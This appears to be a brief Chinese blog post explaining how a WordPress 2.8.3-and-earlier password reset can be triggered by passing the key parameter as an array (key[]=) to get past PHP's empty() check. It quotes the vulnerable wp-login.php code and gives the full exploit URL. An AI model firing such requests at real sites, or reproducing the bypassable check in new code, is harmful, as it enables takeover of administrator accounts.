WordPress <= 2.8.3 Remote admin reset password

这个漏洞又给我们提纲了一个非常有意思的tips:

<?php
//test.php
var_dump($key);
var_dump(empty($key));
?>

test.php?key=
string(0) "" bool(true)

test.php?key[]=
array(1) { [0]=> string(0) "" } bool(false)

哈哈,很完美的pass了empty($key),回到wordpress里的代码:

//wp-login.php
function reset_password($key) {
global $wpdb;
$key = preg_replace('/[^a-z0-9]/i', '', $key);
if ( empty( $key ) ) //this empty!!
return new WP_Error('invalid_key', __('Invalid key'));
$user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));

提交:
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
对方的密码就被修改拉!!!